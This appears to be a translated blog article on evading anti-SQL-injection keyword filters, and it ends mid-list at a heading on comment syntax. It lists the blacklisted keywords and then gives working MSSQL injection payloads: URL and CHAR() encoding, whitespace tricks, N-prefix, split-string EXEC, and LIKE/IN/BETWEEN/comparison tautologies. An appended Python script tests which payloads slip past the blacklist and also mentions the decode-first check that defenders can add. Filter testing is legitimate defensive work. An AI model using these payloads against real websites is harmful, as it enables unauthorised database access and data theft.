It suddenly occurred to me to ask what methods could be used to get around anti-SQL-injection filters. Looking at what has been written on the subject, most of the methods aim at getting past the filtering of AND, the single quote and "=". That is some progress, but certain keywords still cannot be bypassed. Since I do not often attack websites, I do not dare to comment on how well the filtering above actually works; what can be said with confidence is that the results will not be good ......
From what I have collected, most anti-injection programs filter the following keywords:
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
The hardest of these to deal with is select. How do we break through it? The problem is not completely solved, but I am sharing what I have with everyone, in the hope that these few modest remarks draw out better ideas from others.
Regarding keyword filtering, the following are the ideas I have collected, plus some of my own.
1st, bypass using encoding techniques
URL encoding or ASCII codes can get past the filter. For example, or 1=1 becomes
%6f%72%20%31%3d%31, and the string test can be written as CHAR(116)+CHAR(101)+CHAR(115)+CHAR(116), which needs no quote characters at all. Note that this only works when the filter inspects the request before it is decoded.
2nd, bypass through whitespace
Replace a single space with two spaces, replace the space with a Tab, or delete the spaces altogether, e.g.
or'swords'='swords'
Because MSSQL is lax about whitespace, the space between or and 'swords' can be removed without affecting execution.
3rd, replace the numeric test with a string comparison
Instead of the classic or 1=1, use
or 'swords'='swords'
This method is being discussed online.
4th, bypass through the type-conversion prefix N
This can be called a good idea: not only can it bypass the restriction to some extent, it also serves to distinguish the functions involved; think it over carefully. Usage is like
or 'swords'=N'swords'
The capital N tells the MSSQL server to treat the string as nvarchar. It performs a type conversion, does not affect the injection statement itself, and can evade signature-based IDS that rely on pattern matching.
5th, bypass by splitting the string with +
How effective this is deserves research, but it is a method nonetheless. For example
or 'swords'='sw'+'ords'; EXEC('IN'+'SERT INTO '+' ..... ')
so that the keyword insert never appears contiguously in the request.
6th, bypass through LIKE
Why did I not think of this before? For example
or 'swords' LIKE 'sw%'
(% is the LIKE wildcard, so the condition is true.) Obviously this easily gets around the filtering of
"=" and ">"
......
7th, bypass through IN
Similar in spirit to LIKE above, e.g.
or 'swords' IN ('swords')
8th, bypass through BETWEEN
For example
or 'swords' BETWEEN 'rw' AND 'tw'
Note that and is itself on the keyword list above, so this only helps against filters that let it through.
9th, bypass through > or <
or 'swords' > 'sw'
or 'swords' < 'tw'
or 1<3
......
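As an added example (not part of the original article), the following Python models the blacklist listed above and checks which of the conditions from sections 1 through 9 slip past it unchanged; for the variants whose syntax SQLite shares with MSSQL, it also confirms that the condition really is true. The keyword list and the payloads are the article's; the function names, the case-insensitive substring matching, and the use of an in-memory SQLite database in place of MSSQL are my assumptions.

```python
import sqlite3
from urllib.parse import unquote

# Blacklist modelled on the keyword list collected in the article above.
# Assumed to match case-insensitively as substrings of the raw request,
# which is how such filters are usually written.
BLACKLIST = ["and", "select", "update", "chr", "delete", "%20from", ";",
             "insert", "mid", "master.", "set", "="]


def is_blocked(payload: str) -> bool:
    """True if the naive blacklist would reject this payload as written."""
    lowered = payload.lower()
    return any(word in lowered for word in BLACKLIST)


def blocked_after_decoding(payload: str) -> bool:
    """The check a filter needs against section 1: decode first, then match."""
    return is_blocked(unquote(payload))


def url_encode_all(s: str) -> str:
    """Section 1: percent-encode every byte, 'or 1=1' -> '%6f%72%20%31%3d%31'."""
    return "".join(f"%{b:02x}" for b in s.encode("ascii"))


def char_concat(s: str) -> str:
    """Section 1: spell a string with CHAR() calls so no quote is needed."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


# The conditions from sections 2-9; every one of them is true in T-SQL.
VARIANTS = {
    "classic": "or 1=1",
    "no_space": "or'swords'='swords'",
    "string_eq": "or 'swords'='swords'",
    "nvarchar": "or 'swords'=N'swords'",
    "split_plus": "or 'swords'='sw'+'ords'",
    "like": "or 'swords' LIKE 'sw%'",
    "in": "or 'swords' IN ('swords')",
    "between": "or 'swords' BETWEEN 'rw' AND 'tw'",
    "gt": "or 'swords'>'sw'",
    "lt": "or 1<3",
}

# Variants whose syntax SQLite shares with MSSQL. N'...' and '+' string
# concatenation are T-SQL-specific and are not evaluated here.
PORTABLE = ["classic", "no_space", "string_eq", "like", "in", "between", "gt", "lt"]


def evading_variants() -> list:
    """Names of the variants the blacklist lets through unmodified."""
    return sorted(name for name, cond in VARIANTS.items() if not is_blocked(cond))


def condition_holds(name: str) -> bool:
    """Evaluate the condition (minus its leading 'or') in an in-memory SQLite DB."""
    cond = VARIANTS[name][len("or"):]
    con = sqlite3.connect(":memory:")
    try:
        row = con.execute(f"SELECT CASE WHEN {cond} THEN 1 ELSE 0 END").fetchone()
    finally:
        con.close()
    return row[0] == 1


if __name__ == "__main__":
    encoded = url_encode_all("or 1=1")
    print("encoded:", encoded,
          "| blocked before decoding:", is_blocked(encoded),
          "| blocked after decoding:", blocked_after_decoding(encoded))
    print("CHAR form of 'test':", char_concat("test"))
    for name, cond in VARIANTS.items():
        truth = condition_holds(name) if name in PORTABLE else "n/a (T-SQL only)"
        print(f"{name:10} blocked={is_blocked(cond)!s:5} true_in_sql={truth}")
```

Running it shows the point of sections 6, 7 and 9: LIKE, IN, > and < pass the list intact, every variant that contains = is caught, and BETWEEN is caught by its own AND. The URL-encoded payload is rejected only when the filter matches after decoding, which is the check a defender should add.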
10th, bypass using comment syntax